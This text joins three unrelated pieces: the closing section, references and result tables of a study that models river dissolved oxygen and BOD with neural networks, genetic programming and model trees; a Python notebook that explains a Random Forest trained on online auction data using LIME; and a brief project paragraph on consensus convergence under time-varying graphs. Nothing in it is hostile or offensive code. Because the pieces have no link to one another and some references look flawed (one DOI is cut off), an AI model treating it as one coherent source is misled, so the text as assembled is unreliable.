maintain their accuracy for low DO values; however, a significant improvement is observed for MGGP for low DO prediction. Thus, further work shall focus on improving the prediction accuracy for lower DO values. Furthermore, it is also recommended to develop models by merging the data of all three stretches into one, as this would provide more data for training, which may improve the overall accuracy.

### Notes

Author Contributions: P.S. (Ph.D. Scholar) conducted all the data collection, model formation and calculations, and wrote the manuscript. S.N.L. (Professor) revised the manuscript. P.S.K. (Associate Professor) revised the manuscript.

Conflict-of-Interest Statement: The authors declare that they have no conflict of interest.

### References
1. Shrivastava P, Burande A, Sharma N. Fuzzy Environmental Model for Evaluating Water Quality of Sangam Zone during Maha Kumbh. Appl. Comput. Intell. Soft Comput. 2013;13:1–7. https://doi.org/10.1155/2013/265924
2. Jingsheng C, Tao Y, Ongley E. Influence of high levels of total suspended solids on measurement of COD and BOD in the Yellow River, China. Environ. Monit. Assess. 2006;116:321–334. http://dx.doi.org/10.1007/s10661-006-7374-2
3. Basant N, Gupta S, Malik A, Singh KP. Linear and nonlinear modeling for simultaneous prediction of dissolved oxygen and biochemical oxygen demand of the surface water—a case study. Chemometr. Intell. Lab. Syst. 2010;104:172–180. http://dx.doi.org/10.1016%2Fj.chemolab.2010.08.005
4. Singh KP, Basant A, Malik A, Jain G. Artificial neural network modeling of the river water quality—a case study. Ecol. Modell. 2009;888–895. http://dx.doi.org/10.1016/j.ecolmodel.2009.01.004
5. Solomatine DP, Ostfeld A. Data-driven modelling: some past experiences and new approaches. J. Hydroinf. 2010;10:3–22. https://doi.org/10.2166/HYDRO.2008.015
6. Orouji H, Bozorg-Haddad O, Fallah-Mehdipour E, Mariño MA. Modeling of water quality parameters using data-driven models. J. Environ. Eng. 2013;139:947–957. http://dx.doi.org/10.1061/(ASCE)EE.1943-7870.0000706
7. Akkoyunlu A, Altun H, Cigizoglu HK. Depth-integrated estimation of dissolved oxygen in a lake. J. Environ. Eng. 2011;137:961–967. http://dx.doi.org/10.1061/(ASCE)EE.1943-7870.0000376
8. Dogan E, Sengorur B, Koklu R. Modeling biological oxygen demand of the Melen River in Turkey using an artificial neural network technique. J. Environ. Manage. 2009;90:1229–1235. https://doi.org/10.1016/j.jenvman.2008.06.004
9. Antanasijević D, Pocajt V, Povrenović D, Perić-Grujić A, Ristić M. Modelling of dissolved oxygen in the Danube River using artificial neural networks and Monte Carlo simulation uncertainty analysis. J. Hydrol. 2013;519:1895–1907. https://doi.org/10.1016/j.jhydrol.2014.10.009
10. Verma AK, Singh TN. Prediction of water quality from simple field parameters. Environ. Earth Sci. 2013;69:821–829. https://doi.org/10.1007/s12665-012-1967-6
11. Schmid BH, Koskiaho J. Artificial neural network modeling of dissolved oxygen in a Wetland Pond: The case of Hovi, Finland. J. Hydrol. Eng. 2006;11:188–192. https://doi.org/10.1061/(ASCE)1084-0699(2006)11:2(188)
12. Talib A. Predicting Biochemical Oxygen Demand as Indicator of River Pollution Using Artificial Neural Network. Int. J. Inf. Educ. Technol. 2012;2–6:259–261. https://mssanz.org.au/modsim09
13. Chen WB, Liu WC. Artificial neural network modeling of dissolved oxygen in reservoir. Environ. Monit. Assess. 2014;186:1203–1217. https://doi.org/10.1007/s10661-013-3450-6
14. Sarkar A, Pandey P. River Water Quality Modelling using Artificial Neural Network Technique. Aquat. Procedia. 2015;4:1070–1077. http://dx.doi.org/10.1016/j.aqpro.2015.02.135
15. Olyaie E, Zare AH, Danandeh MA. A comparative analysis among computational intelligence techniques for dissolved oxygen prediction in Delaware River. Geosci. Front. 2017;8:517–527. http://dx.doi.org/10.1016%2Fj.gsf.2016.04.007
16. Heddam S, Kisi O. Modelling Daily Dissolved Oxygen Concentration Using Least Square Support Vector Machine, Multivariate Adaptive Regression Splines and M5 Model Tree. J. Hydrol. 2018;1–38. https://doi.org/10.1016/J.JHYDROL.2018.02.061
17. Gandomi AH, Alavi AH. A new multi-gene genetic programming approach to nonlinear system modeling. Part I: materials and structural engineering problems. Neural Comput. Appl. 2011;21:171–187. http://dx.doi.org/10.1007/s00521-011-0734-z
18. Murat A, Kisi O. Modeling of dissolved oxygen concentrations using different neural network techniques in Foundation Creek, El Paso County, Colorado. J. Environ. Eng. ASCE. 2012;138:654–662. https://doi.org/10.1061/(ASCE)EE.1943-7870.0000511
19. The ASCE Task Committee. Artificial Neural Networks in Hydrology I: Preliminary concepts. J. Hydrol. Eng. 2000;5:115–123. https://doi.org/10.1061/(ASCE
20. Maier H, Dandy G. Neural networks for the prediction and forecasting of water resources variables: a review of modelling issues and applications. Environ. Model. Softw. 2000;15:101–124. http://dx.doi.org/10.1016/S1364-8152(99)00007-9
21. Dawson CW, Wilby RL. Hydrological modeling using Artificial Neural Networks. Prog. Phys. Geogr. 2001;25:80–108. http://dx.doi.org/10.1177/030913330102500104
22. Jain P, Deo MC. Neural Networks in Ocean Engineering. Int. J. Ships Offshore Struct. 2006;1:25–35. https://doi.org/10.1533/saos.2004.0005
23. Londhe SN, Panchang V. Correlation of wave data from buoy networks. Estuar. Coast. Shelf Sci. 2007;4:481–492. http://dx.doi.org/10.1016/j.ecss.2007.05.003
24. Mohamed E. Developing a Neural Networks Model for Evaluating Financial Performance of Residential Companies. IOSR J. Mech. Civ. Eng. 2017;14:46–59. https://doi.org/10.9790/1684-1402024659
25. Kulkarni PS, Londhe SN, Dixit PD. A comparative study of concrete strength prediction using artificial neural network, multigene programming and model tree. Chall. J. Struct. Mech. 2019;5:42–61. https://doi.org/10.20528/CJSMEC.2019.02.002
26. Hashmi S, Halawani SM, Barukab OM, Ahmad A. Model trees and sequential minimal optimization based support vector machine models for estimating minimum surface roughness value. Appl. Math. Model. 2015;39:1119–1136. https://doi.org/10.1016/J.APM.2014.07.026
27. Abolfathi S, Yeganeh-Bakhtiary A, Hamze-Ziabari SM, Borzooei S. Wave run up prediction using M5 model tree algorithm. Ocean Eng. 2015;112:76–81. http://dx.doi.org/10.1016/j.oceaneng.2015.12.016
28. Quinlan JR. Learning with continuous classes. In: Proceedings of the Fifth Australian Joint Conference on Artificial Intelligence; 16–18 November 1992; Hobart, Australia. Singapore: p. 343–348.
29. Solomatine DP, Xue Y. M5 model trees compared to neural networks: application to flood forecasting in the upper reach of the Huai River in China. J. Hydrol. Eng. 2004;9:491–501. https://doi.org/10.1061/(ASCE)1084-0699(2004)9:6(491)
30. Solomatine DP, Dulal K. Model tree as an alternative to neural network in rainfall-runoff modeling. Hydrol. Sci. J. 2003;48:399–411. https://doi.org/10.1623/hysj.48.3.399.45291
31. Rahimikhoob A, Behbahani SMR, Banihabib ME. Comparative study of statistical and artificial neural network's methodologies for deriving global solar radiation from NOAA satellite image. Int. J. Climatol. 2013;33:480–486. http://dx.doi.org/10.1002/joc.3441
32. Searson DP, Leahy DE, Willis MJ. GPTIPS: An open source genetic programming toolbox for multigene symbolic regression. In: Proceedings of the International Multi Conference of Engineers and Computer Scientists I, IMECS; March 17–19, 2010; Hong Kong. http://sites.google.com/site/gptips4matlab/
33. Londhe SN, Dixit PR. Genetic Programming: A Novel Computing Approach in Modeling Water Flows. In: Genetic Programming – New Approaches and Successful Applications. InTech; 2009. p. 201–207. http://dx.doi.org/10.5772/48179
34. Shahin MA. State-of-the-art review of some artificial intelligence applications in pile foundations. Geosci. Front. 2014;1–12. https://doi.org/10.1016/j.gsf.2014.10.002
##### Fig. 1 Frequency Analysis chart for MGGP Model 1-1.

##### Fig. 2 DO Prediction for Model 1-1 by ANN-MGGP-M5T.

##### Fig. 3 BOD Prediction for Model 2-2 by ANN-MGGP-M5T.

##### Fig. 4 Classifier Tree for M5T Model 3-1.

##### Fig. 5 BOD Prediction for Model 3-3 by ANN-MGGP-M5T.

##### Table 1 Details of Models Developed

| Targeted output | Model No. | ANN architecture | Number of equations in M5T | Parameters not considered in the MGGP equation |
|---|---|---|---|---|
| Dissolved Oxygen (DO) | 1-1 | 6:10:1 | 3 | NIL |
| | 1-2 | 6:11:1 | 1 | Alkalinity and pH |
| | 1-3 | 6:32:1 | 6 | NIL |
| Biochemical Oxygen Demand (BOD) (by observed DO with other parameters) | 2-1 | 7:8:1 | 1 | TS, Alkalinity, TDS |
| | 2-2 | 7:8:1 | 4 | NIL |
| | 2-3 | 7:4:1 | 2 | TS, Alkalinity, EC |
| Biochemical Oxygen Demand (BOD) (by modelled DO with other parameters) | 3-1 | 7:4:1 | 1 | TS & TDS |
| | 3-2 | 7:1:1 | 1 | Alkalinity |
| | 3-3 | 7:4:1 | 2 | pH & TDS |

##### Table 2 Performance of Models Developed Using ANN, MGGP and M5T for Prediction of DO and BOD

| Set | Targeted output | Technique | Model No. | RMSE (mg/L) | MARE (mg/L) | R |
|---|---|---|---|---|---|---|
| Set 1 | Dissolved Oxygen (DO) | ANN | 1-1 | 0.61 | 0.02 | 0.89 |
| | | | 1-2 | 0.98 | 0.04 | 0.91 |
| | | | 1-3 | 1.52 | 0.25 | 0.82 |
| | | MGGP | 1-1 | 0.51 | 0.08 | 0.88 |
| | | | 1-2 | 1.43 | 0.06 | 0.90 |
| | | | 1-3 | 0.08 | 0.008 | 0.85 |
| | | M5T | 1-1 | 1.98 | 0.11 | 0.78 |
| | | | 1-2 | 1.14 | 0.06 | 0.82 |
| | | | 1-3 | 0.70 | 0.08 | 0.78 |
| Set 2 | BOD (using observed DO along with other parameters) | ANN | 2-1 | 0.12 | 0.002 | 0.91 |
| | | | 2-2 | 0.738 | 0.005 | 0.92 |
| | | | 2-3 | 0.848 | 0.012 | 0.89 |
| | | MGGP | 2-1 | 0.49 | 0.008 | 0.96 |
| | | | 2-2 | 0.98 | 0.009 | 0.91 |
| | | | 2-3 | 1.27 | 0.02 | 0.90 |
| | | M5T | 2-1 | 2.12 | 0.04 | 0.85 |
| | | | 2-2 | 1.42 | 0.05 | 0.88 |
| | | | 2-3 | 1.97 | 0.08 | 0.88 |
| Set 3 | BOD (using modelled DO along with other parameters) | ANN | 3-1 | 1.98 | 0.19 | 0.85 |
| | | | 3-2 | 1.84 | 0.04 | 0.80 |
| | | | 3-3 | 1.83 | 0.21 | 0.80 |
| | | MGGP | 3-1 | 2.03 | 0.24 | 0.86 |
| | | | 3-2 | 2.16 | 0.08 | 0.80 |
| | | | 3-3 | 0.98 | 0.02 | 0.80 |
| | | M5T | 3-1 | 1.54 | 0.58 | 0.81 |
| | | | 3-2 | 3.93 | 0.12 | 0.73 |
| | | | 3-3 | 3.5 | 0.32 | 0.79 |

##### Table 3 Equations for Each of the Genes

| Term | Value |
|---|---|
| Bias | 4.16 |
| Gene 1 | 0.0214 (EC)(TS)^(1/2)(pH)/(Alk.) |
| Gene 2 | −(0.00163 (2.0 (TS)(pH) + (TDS)(NO3−NO2) + 2.0 (EC)^(3/2)(pH)))/(pH) |
| Gene 3 | 0.0651 (Alk.) + 0.0651 (pH) − 0.0651 (Alk.)^(1/2) |
| Gene 4 | 2.98e−6 (EC)^(5/2) |
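Table 3 lists the bias and gene terms of one evolved MGGP model (from the inputs used, most likely one of the DO models, although the table itself does not say). As a minimal sketch of how such a multigene model is evaluated, assuming the usual GPTIPS convention that the prediction is the bias plus the sum of the gene terms, and using hypothetical input values:

```python
import math

def mggp_predict(ec, ts, ph, alk, tds, no3_no2):
    """Sketch: evaluate the multigene model of Table 3 as bias + sum of genes.

    Assumes the standard GPTIPS-style convention that the model output is the
    bias term plus the sum of all gene terms; inputs are the raw water-quality
    parameters (EC, TS, pH, alkalinity, TDS, NO3-NO2) in the units of the study.
    """
    gene1 = 0.0214 * ec * math.sqrt(ts) * ph / alk
    gene2 = -(0.00163 * (2.0 * ts * ph + tds * no3_no2 + 2.0 * ec**1.5 * ph)) / ph
    gene3 = 0.0651 * alk + 0.0651 * ph - 0.0651 * math.sqrt(alk)
    gene4 = 2.98e-6 * ec**2.5
    return 4.16 + gene1 + gene2 + gene3 + gene4

# Hypothetical example inputs (illustration only, not data from the study):
print(mggp_predict(ec=350.0, ts=400.0, ph=7.8, alk=180.0, tds=250.0, no3_no2=1.2))
```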
# Interpreting Machine Learning Algorithms with LIME

We have often found that Machine Learning (ML) algorithms capable of capturing structural non-linearities in training data - models that are sometimes referred to as 'black box' (e.g. Random Forests, Deep Neural Networks, etc.) - perform far better at prediction than their linear counterparts (e.g. Generalised Linear Models). They are, however, much harder to interpret - in fact, quite often it is not possible to gain any insight into why a particular prediction has been produced, when given an instance of input data (i.e. the model features). Consequently, it has not been possible to use 'black box' ML algorithms in situations where clients have sought cause-and-effect explanations for model predictions, with the end result that sub-optimal predictive models have been used in their place because their explanatory power was judged more valuable in relative terms.

In this notebook, we trial a different approach - we train a 'black box' ML model to the best of our abilities and then apply an ancillary algorithm to generate explanations for its predictions. More specifically, we will test the ability of the Local Interpretable Model-agnostic Explanations (LIME) algorithm, recently described by Ribeiro et al. (2016), to provide explanations for a Random Forest regressor trained on multiple-lot on-line auction data.

The paper that describes the LIME algorithm can be found here: https://arxiv.org/pdf/1602.04938v1.pdf; details of its implementation in Python (as used in this notebook) can be found here: https://github.com/marcotcr/lime/; while a more general discussion of ML algorithm interpretation (that includes LIME) can be found in the eBook by Christoph Molnar, which can be found here: https://christophm.github.io/interpretable-ml-book/.

In [1]:

%matplotlib inline

import numpy as np
import pandas as pd
import matplotlib.pyplot as plt

## Load Data and Yield Pandas DataFrame

Load the auction data from the CSV file and take a quick glimpse.
In [2]:

auction_eval = pd.read_csv('../data/auction_data.csv')
auction_eval.info()

<class 'pandas.core.frame.DataFrame'>
RangeIndex: 6220 entries, 0 to 6219
Data columns (total 10 columns):
auction_id       6220 non-null int64
RoR              6220 non-null float64
STR              6220 non-null float64
BPL              6220 non-null float64
lots             6220 non-null int64
product_types    6220 non-null float64
avg_reserve      6220 non-null float64
avg_start_bid    6220 non-null float64
auction_mech     6220 non-null object
country          6220 non-null object
dtypes: float64(6), int64(2), object(2)
memory usage: 486.0+ KB

Out[2]:

| | auction_id | RoR | STR | BPL | lots | product_types | avg_reserve | avg_start_bid | auction_mech | country |
|---|---|---|---|---|---|---|---|---|---|---|
| 0 | 1324 | 0.984284 | 0.035471 | 11.066667 | 45 | 0.822222 | 22090.283008 | 0.000000 | EnglishForward | TR |
| 1 | 1325 | 0.000000 | 0.000000 | 11.000000 | 52 | 0.634615 | 18758.711989 | 0.000000 | EnglishForward | TR |
| 2 | 1326 | 0.774436 | 0.723315 | 7.000000 | 4 | 1.000000 | 9593.157715 | 0.161214 | EnglishForward | CZ |
| 3 | 1327 | 0.933634 | 0.822529 | 17.464286 | 28 | 0.857143 | 16195.701695 | 0.000000 | EnglishForward | EU |
| 4 | 1328 | 0.957757 | 0.963006 | 11.487179 | 39 | 0.820513 | 8733.333333 | 0.000000 | EnglishForward | EU |

### Data Description

- auction_id - unique identifier for a single multi-lot online auction event;
- RoR - the average Return-on-Reserve for successfully sold lots in the multi-lot online auction event, computed as realised price divided by reserve price;
- STR - the proportion of lots (by value) that were successfully sold in the auction event;
- BPL - the average number of bidders per-lot;
- lots - the number of lots offered in the multi-lot online auction event;
- product_types - the number of different product types offered in the multi-lot online auction event;
- avg_reserve - the average reserve price over all lots in the multi-lot online auction event;
- avg_start_bid - the average starting bid (expressed as a fraction of the reserve bid) over all lots in the multi-lot online auction event;
- auction_mech - the auction mechanism used for the auction event (one of English Forward, Sealed Bid or Fixed Price); and,
- country - the local market running the auction.

The goal of the modeling exercise is to use as many features as possible to explain the drivers of RoR, ex-ante - that is, features that represent configurable auction (or marketplace) parameters, not auction outcomes (like RoR itself). We make an exception for BPL, as we would like to know how the success of a pre-auction marketing process, which can be viewed as a driving factor of BPL, impacts RoR.

In [3]:

RoR = ['RoR']

model_features = ['BPL', 'lots', 'product_types', 'avg_reserve',
                  'avg_start_bid', 'auction_mech', 'country']

### Outlier Removal and other Dataset Filtering

We are aware that outliers have found their way into the data, so we will limit our modeling dataset by filtering-out values that don't feel correct, based on our knowledge of the data (and the issues embedded within it). As such, we will filter-out the top percentile of RoR values, as we know there is ambiguity surrounding reserve prices. Likewise, we have spotted auction events with average reserve prices in the millions of Euros, so we will filter-out the top percentile of mean reserve price observations as well.
In [5]:

pctile_thold = 0.99

model_data = (
    auction_eval.copy()
    .loc[(auction_eval['STR'] > 0)
         & (auction_eval['RoR'] < auction_eval['RoR'].quantile(pctile_thold))
         & (auction_eval['avg_reserve'] < auction_eval['avg_reserve'].quantile(pctile_thold)), :]
    .assign(country = auction_eval['country'].apply(lambda x: 'country_' + x),
            auction_mech = auction_eval['auction_mech'].apply(lambda x: 'auction_mech_' + x))
    [RoR + model_features])

desc_features = ['auction_id']

model_data.describe()

Out[5]:

| | RoR | BPL | lots | product_types | avg_reserve | avg_start_bid |
|---|---|---|---|---|---|---|
| count | 5581.000000 | 5581.000000 | 5581.000000 | 5581.000000 | 5581.000000 | 5581.000000 |
| mean | 0.986065 | 6.424684 | 41.514603 | 0.768097 | 10975.097908 | 0.153462 |
| std | 0.124448 | 5.157156 | 38.249595 | 0.202118 | 4904.108680 | 0.348923 |
| min | 0.052569 | 1.000000 | 1.000000 | 0.002841 | 200.000000 | 0.000000 |
| 25% | 0.940870 | 1.000000 | 12.000000 | 0.682540 | 7479.575548 | 0.000000 |
| 50% | 1.000000 | 6.000000 | 31.000000 | 0.800000 | 10100.000000 | 0.000000 |
| 75% | 1.026710 | 10.702703 | 60.000000 | 0.900000 | 13674.104112 | 0.000000 |
| max | 1.617087 | 36.000000 | 516.000000 | 1.000000 | 30198.234375 | 1.000000 |

## Modelling RoR

The purpose of this notebook is to use a learning algorithm - such as a Random Forest - that is capable of modeling non-linear relationships between the input (independent) variables (or features) and the output, and then to apply the LIME algorithm to identify the key drivers of the output for any particular Out-Of-Sample (OOS) instance.

### Data Preparation Pipeline

We need to set up a data preparation pipeline for handling the systematic selection of features from the input DataFrame (and their mapping to a NumPy ndarray), creating a new factor variable to identify the presence/absence of starting bids (as the average is a bit too rough-and-dirty), and handling categorical data (via factorising). Note that we haven't re-scaled the features, as our intention is to use Random Forests to capture the non-linearities in the dataset, and these do not benefit from any re-scaling process.
In [6]:

from sklearn.pipeline import Pipeline, FeatureUnion
from sklearn.preprocessing import StandardScaler, LabelEncoder, FunctionTransformer

# helper functions
def cat_col_selector(df):
    df_cat = df.select_dtypes(include=['object'])
    return df_cat.values

def num_col_selector(df):
    df_num = df.select_dtypes(exclude=['object'])
    return df_num.values

def cat_col_str2fact(X):
    fact_cols = [LabelEncoder().fit_transform(col) for col in X.T]
    fact_mat = np.vstack(fact_cols)
    return fact_mat.T

def cat_col_fact_names(df):
    def list_of_fact_names(col):
        fact_names = LabelEncoder().fit(col).classes_
        return fact_names

    df_cat = df.select_dtypes(include=['object'])
    X = df_cat.values
    fact_name_cols = [(col_name, list_of_fact_names(col))
                      for col_name, col in zip(df_cat.columns, X.T)]
    return dict(fact_name_cols)

def make_new_features(df):
    start_bid_map = lambda x: 'start_bids_true' if x > 0 else 'start_bids_false'
    new_df = (df
              .assign(start_bids=df['avg_start_bid'].apply(start_bid_map))
              .drop(['avg_start_bid'], axis=1))
    return new_df

# pipeline for features
ivar_data_pipe = Pipeline([
    ('make_new_features', FunctionTransformer(make_new_features, validate=False)),
    ('union', FeatureUnion([
        ('num_features', Pipeline([
            ('get_num_features', FunctionTransformer(num_col_selector, validate=False))
        ])),
        ('cat_vars', Pipeline([
            ('get_cat_features', FunctionTransformer(cat_col_selector, validate=False)),
            ('factorise', FunctionTransformer(cat_col_str2fact, validate=False))
        ]))
    ]))
])

# get feature names
num_feature_names = (
    make_new_features(model_data[model_features])
    .select_dtypes(exclude=['object'])
    .columns
    .tolist())

cat_feature_names = (
    make_new_features(model_data[model_features])
    .select_dtypes(include=['object'])
    .columns
    .tolist())

all_feature_names = num_feature_names + cat_feature_names

# get levels for categorical data
cat_col_levels = cat_col_fact_names(make_new_features(model_data[model_features]))

# perform transformations
y = (model_data
     ['RoR']
     .values
     .reshape(-1, ))

X = (ivar_data_pipe
     .fit_transform(model_data[model_features]))

X_df = pd.DataFrame(X, columns=all_feature_names)
X_df.head()

Out[6]:

| | BPL | lots | product_types | avg_reserve | auction_mech | country | start_bids |
|---|---|---|---|---|---|---|---|
| 0 | 11.066667 | 45.0 | 0.822222 | 22090.283008 | 0.0 | 24.0 | 0.0 |
| 1 | 7.000000 | 4.0 | 1.000000 | 9593.157715 | 0.0 | 5.0 | 1.0 |
| 2 | 17.464286 | 28.0 | 0.857143 | 16195.701695 | 0.0 | 8.0 | 0.0 |
| 3 | 11.487179 | 39.0 | 0.820513 | 8733.333333 | 0.0 | 8.0 | 0.0 |
| 4 | 1.000000 | 44.0 | 0.750000 | 6531.818182 | 1.0 | 8.0 | 0.0 |

### Partition Data into Test and Train Sets

In [7]:

from sklearn.model_selection import train_test_split

X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)

print('{} samples in training dataset and {} samples in test dataset'
      .format(X_train.shape[0], X_test.shape[0]))

4464 samples in training dataset and 1117 samples in test dataset

For the test DataFrame only, we map the categorical feature levels to actual (string) categories to make it easier to read when testing LIME later on.
In [19]:

training_instances = pd.DataFrame(
    np.hstack((y_test.reshape(-1, 1), X_test)),
    columns=['RoR'] + all_feature_names)

training_instances['auction_mech'] = (
    training_instances['auction_mech']
    .apply(lambda e: cat_col_levels['auction_mech'][int(e)]))

training_instances['country'] = (
    training_instances['country']
    .apply(lambda e: cat_col_levels['country'][int(e)]))

training_instances['start_bids'] = (
    training_instances['start_bids']
    .apply(lambda e: cat_col_levels['start_bids'][int(e)]))

### Define Experimental Setup

We will use RMSE as a test metric and 5-fold cross-validation to get a basic estimate of the model's performance out-of-sample.

In [9]:

from sklearn.model_selection import cross_val_score
from sklearn.metrics import mean_squared_error

def rmse(model_fit, features, labels):
    predictions = model_fit.predict(features)
    rmse = np.sqrt(mean_squared_error(labels, predictions))
    print('in-sample RMSE = {}'.format(rmse))
    return None

def cv_results(model_fit, features, labels):
    scores = cross_val_score(model_fit, features, labels,
                             scoring='neg_mean_squared_error', cv=5)
    cv_mean_rmse = np.sqrt(-scores).mean()
    cv_std_rmse = np.sqrt(-scores).std()
    print('Cross-Val RMSE = {} +/- {}'.format(cv_mean_rmse, cv_std_rmse))
    return None

### Estimate Random Forest Regression Model

We have chosen to estimate a Random Forest model as the 'black box' model, on which we will apply the LIME algorithm to derive insights into which features are the most important for explaining a particular instance. We appreciate that Random Forests are not truly 'black box' models (e.g. when compared against a neural network), as it is possible to extract 'relative feature importance' via a number of ancillary algorithms - for example, by computing the expected fraction of samples that a split on a particular feature will affect at an internal node. This is not, however, as useful a measure as a regression coefficient in a linear model, which captures effect magnitudes as well as relative importance and is not subject to the randomness of the forest. Regardless, we see this as a benefit, as we then have the chance to compare LIME's output with the Random Forest's expected relative variable importances.

We start by using the default Random Forest regression parameters as implemented in Scikit-Learn, estimating the model on the training data, and running our cross-validation experiment to get an idea of how much over-fitting we can expect and what out-of-sample performance we can anticipate.

In [10]:

from sklearn.ensemble import RandomForestRegressor

forest_reg = RandomForestRegressor(n_jobs=2, random_state=42)
forest_reg.fit(X_train, y_train)

rmse(forest_reg, X_train, y_train)
cv_results(forest_reg, X_train, y_train)

in-sample RMSE = 0.043177262592097386
Cross-Val RMSE = 0.10006108388998118 +/- 0.007050697254328054

We now apply a grid search to find the best set of hyper-parameters.
In [11]:

from sklearn.model_selection import GridSearchCV

# configure grid search
forest_reg_param_grid = [{
    'bootstrap': [True, False],
    'n_estimators': [20, 40],
    'max_features': [3, 5, 7],
    'min_samples_split': [2, 4, 8, 16],
    'random_state': [42]}]

forest_reg_grid = GridSearchCV(
    forest_reg, forest_reg_param_grid, cv=5,
    scoring='neg_mean_squared_error', n_jobs=2, return_train_score=True)

# fit grid search
forest_reg_grid.fit(X_train, y_train)

# print results
print('best CV score: {}'.format(np.sqrt(-forest_reg_grid.best_score_)))
print('\n------------------------')
print('best parameters on grid:')
print('------------------------')
for k, v in forest_reg_grid.best_params_.items():
    print('{0}: {1}'.format(k, v))
print('------------------------')

best CV score: 0.0963582247413044
------------------------
best parameters on grid:
------------------------
bootstrap: True
max_features: 5
min_samples_split: 8
n_estimators: 40
random_state: 42
------------------------

We now use the best-fit model to score the test dataset.

In [12]:

predicted = forest_reg_grid.best_estimator_.predict(X_test)
error = predicted - y_test
abs_error = np.absolute(error)

model_performance = pd.DataFrame(
    np.concatenate([predicted.reshape((-1, 1)),
                    y_test.reshape((-1, 1)),
                    error.reshape((-1, 1)),
                    abs_error.reshape((-1, 1))], axis=1),
    columns=['predicted', 'actual', 'error', 'abs_error'])

print('Out-of-sample RMSE = {}'.format(np.sqrt(np.mean(error ** 2))))

_ = (model_performance
     .plot(kind='scatter', x='predicted', y='actual', alpha=0.1,
           xlim=[0, 2], ylim=[0, 2]))

Out-of-sample RMSE = 0.08751609140478654

We now take a look at the distribution of errors (i.e. the residuals).

In [13]:

_ = plt.hist(error, density=True, bins=50, histtype='bar')

We can see from the model's OOS performance, as illustrated in the above two plots, that it does a 'reasonable' job of predicting RoR, with the main sources of error coming predominantly from a small collection of poor predictions.

## Model Interpretation using LIME

Now that we have estimated our model and have some insight into its expected performance, we turn our attention to applying the LIME algorithm to get deeper insight into the specific features that were key in driving the prediction for a particular instance of input data (e.g. from our test dataset). At a high level, the LIME algorithm for a regression task performs the following steps:

1. simulate artificial test instances, using Normal distributions for continuous variables and empirical distributions for categorical variables (note that continuous variables can also be discretised and treated as categorical variables - we have chosen this approach, based on quartiles);
2. using an exponential (Gaussian) kernel with 'width' (variance) equal to sqrt(number of columns) * 0.75, generate a weight for each artificial test instance; and,
3. estimate a linear regression model using the weighted artificial instances. If the number of variables is less than or equal to 6, then one model for every possible combination of factors is estimated, to find the top N features that have the greatest predictive power for explaining the global model's prediction (by brute force). If there are more than 6 variables, then a lasso regression is used and the hyper-parameter (the magnitude of the regularisation term) is tuned to yield the chosen number of explanatory variables.
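As a rough sketch of steps 2 and 3 above (this is not the library's exact code: the helper name is ours, the feature-selection step is omitted, and a simple ridge fit on all features stands in for LIME's selection logic), the local surrogate fit looks something like this:

```python
import numpy as np
from sklearn.linear_model import Ridge

def lime_style_local_fit(perturbed_X, black_box_preds, instance, kernel_width=None):
    """Sketch of LIME's weighting + weighted local linear fit for regression.

    perturbed_X     : (n_samples, n_features) artificial instances around `instance`
    black_box_preds : black-box model predictions for perturbed_X
    instance        : the instance being explained (1-D array)
    """
    if kernel_width is None:
        kernel_width = np.sqrt(perturbed_X.shape[1]) * 0.75    # width described in step 2
    d = np.linalg.norm(perturbed_X - instance, axis=1)          # distances to the instance
    weights = np.sqrt(np.exp(-(d ** 2) / kernel_width ** 2))    # exponential kernel weights
    local_model = Ridge(alpha=1.0)                              # regularised linear surrogate
    local_model.fit(perturbed_X, black_box_preds, sample_weight=weights)
    return local_model.coef_, local_model.intercept_
```

The coefficients of this weighted local model are what get reported as the explanation for the single instance.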
### Setup LIME Algorithm

In [15]:

from lime.lime_tabular import LimeTabularExplainer

categorical_feature_maps = dict([
    (n, e[1]) for n, e in zip(range(4, 7), cat_col_levels.items())])

explainer = LimeTabularExplainer(
    X_train,
    feature_names=all_feature_names,
    class_names=['RoR'],
    categorical_features=np.arange(4, 7),
    categorical_names=categorical_feature_maps,
    verbose=True,
    mode='regression',
    feature_selection='auto',
    discretize_continuous=True,
    discretizer='quartile',
    random_state=42)

### Explore Key Features in Instance-by-Instance Predictions

Start by choosing an instance from the test dataset (we have reproduced the entire set of these instances in the Appendix, below, for reference).

In [16]:

training_data_instance_number = 10

Use LIME to estimate a local model to use for explaining our model's predictions. The outputs will be:

1. the intercept estimated for the local model;
2. the local model's estimate for the Regression Forest's prediction; and,
3. the Regression Forest's actual prediction.

Note that the actual value from the training data does not enter into this - the idea of LIME is to gain insight into why the chosen model - in our case the Random Forest regressor - is predicting whatever it has been asked to predict. Whether or not this prediction is actually any good is a separate issue.

In [17]:

i = training_data_instance_number

explanation = explainer.explain_instance(
    X_test[i], forest_reg_grid.best_estimator_.predict, num_features=5)

Intercept 1.0191330793569726
Prediction_local [0.98157252]
Right: 0.9957654428132873

Print the DataFrame row for the chosen test instance.

In [20]:

training_instances.loc[[i]]

Out[20]:

| | RoR | BPL | lots | product_types | avg_reserve | auction_mech | country | start_bids |
|---|---|---|---|---|---|---|---|---|
| 10 | 0.895324 | 6.933333 | 95.0 | 0.715789 | 18753.378947 | auction_mech_SealedBid | country_FR | start_bids_false |

Now take a look at LIME's interpretation of our Random Forest's prediction.

In [21]:

explanation.show_in_notebook(show_table=True)
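Beyond the notebook widget, the explanation object can also be inspected programmatically, which makes it easy to put LIME's local weights next to the forest's global importances. The snippet below is a small illustration (the exact wording of the feature descriptions returned by `as_list()` depends on the discretiser settings used above):

```python
# LIME's local explanation as (feature description, weight) pairs
for feature_desc, weight in explanation.as_list():
    print('{:<45s} {:+.4f}'.format(feature_desc, weight))

# The Random Forest's global relative feature importances, for comparison
importances = forest_reg_grid.best_estimator_.feature_importances_
for name, imp in sorted(zip(all_feature_names, importances), key=lambda t: -t[1]):
    print('{:<15s} {:.3f}'.format(name, imp))
```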
# Projects

Consensus is a scenario where multiple agents interact with each other to converge asymptotically towards a common value. In recent times, convergence analysis of consensus protocols has drawn significant research attention among control researchers; however, a large part of this analysis is based on a time-invariant graph structure. Our work [1] provides bounds on the convergence rates to consensus that hold for a large class of time-varying edge weights. A novel analysis approach based on classical notions of persistence of excitation and uniform complete observability has been developed. Furthermore, in [2], a novel application of results from Ramsey theory allows for proof of consensus and convergence rate estimation under a switching graph topology. Sample spanning tree graphs and the corresponding convergence of spanning tree edges to consensus, along with a rate envelope, are shown below.

